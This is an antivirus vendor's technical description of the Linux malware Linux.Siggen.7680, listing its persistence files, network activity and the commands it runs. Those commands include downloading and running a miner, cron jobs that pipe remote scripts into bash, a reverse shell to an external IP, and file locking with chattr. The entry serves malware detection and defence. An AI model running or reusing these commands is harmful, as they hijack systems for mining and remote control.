JavaScript support is required for our site to be fully operational in your browser.
Linux.Siggen.7680
Added to the Dr.Web virus database:
2024-06-25
Virus description added:
2024-06-24
Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
/etc/cron.d/watch
/etc/cron.hourly/prelink
Malicious functions:
Launches itself as a daemon
Gets access to SSH keys
/root/.ssh/authorized_keys2
/root/.ssh/authorized_keys
Performs process tracing:
Launches processes:
rm -f /etc/hosts.old
curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner && chmod 755 /tmp/.miner && /tmp/.miner
chattr -ia /etc/crontab > /dev/null 2>&1
chattr -ia -R /var/spool/cron/crontabs
chattr -ia -R /root/.ssh
chattr +i /etc/cron.hourly/prelink
chattr -ia -R /var/spool/cron/crontabs > /dev/null 2>&1
curl -fs http://w.softprojectcode.com/miner -o /tmp/.miner
chmod 755 /etc/cron.hourly/prelink
rm -rf /root/.ssh/authorized_keys2
echo \x27#!/bin/bash\x27 > /etc/cron.hourly/prelink
chattr +i /etc/cron.hourly/prelink > /dev/null 2>&1
chmod 755 /tmp/.miner
/tmp/.miner
chattr +i /etc/cron.d/watch > /dev/null 2>&1
echo \x270 2 * * * root wget -c http://z.shavsl.com/b -qO -|bash \x27 >> /etc/cron.d/watch
rm -rf /root/.ssh/authorized_keys
chattr -ia /etc/crontab
echo \x270 1 * * * root curl -fs http://z.shavsl.com/b|bash \x27 > /etc/cron.d/watch
chattr -ia -R /etc/cron.d
chattr +i /root/.ssh/authorized_keys2
chattr -ia -R /etc/cron.d > /dev/null 2>&1
chattr -ia -R /var/spool/cron
chattr +i /etc/cron.d/watch
chattr -ia -R /etc/cron.hourly
chattr -ia -R /etc/cron.hourly > /dev/null 2>&1
chattr +i /root/.ssh/authorized_keys
echo \x27bash -i >& /dev/tcp/198.144.156.34/8443 0>&1\x27 >> /etc/cron.hourly/prelink
chattr -ia -R /var/spool/cron > /dev/null 2>&1
Performs operations with the file system:
Modifies file access rights:
/etc/cron.hourly/prelink
/tmp/.miner
Creates folders:
Creates or modifies files:
Deletes files:
/root/.ssh/authorized_keys2
/etc/hosts.old
Network activity:
Establishes connection:
8.#.8.8:53
66.###.228.52:80
45.###.200.163:3334
45.###.200.163:6666
127.0.0.1:3334
127.0.0.1:6666
45.###.200.163:3333
127.0.0.1:3333
84.##.44.239:53126
17#.##.81.161:53126
45.###.200.163:53126
127.0.0.1:53126
DNS ASK:
w.#####rojectcode.com
o.######ldinformation.com
o.#####rojectcode.com
rt#.####goldinformation.com
rt#.###tprojectcode.com
Sends data to the following servers:
Receives data from the following servers:
Other:
Collects CPU information
Collects RAM information
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
Download Dr.Web for Android
Free three-month trial
All protection features available
Renew your trial license in AppGallery/on Google Pay
By continuing to use this website, you are consenting to Doctor Web’s use of cookies and other technologies related to the collection of visitor statistics. Learn more
OK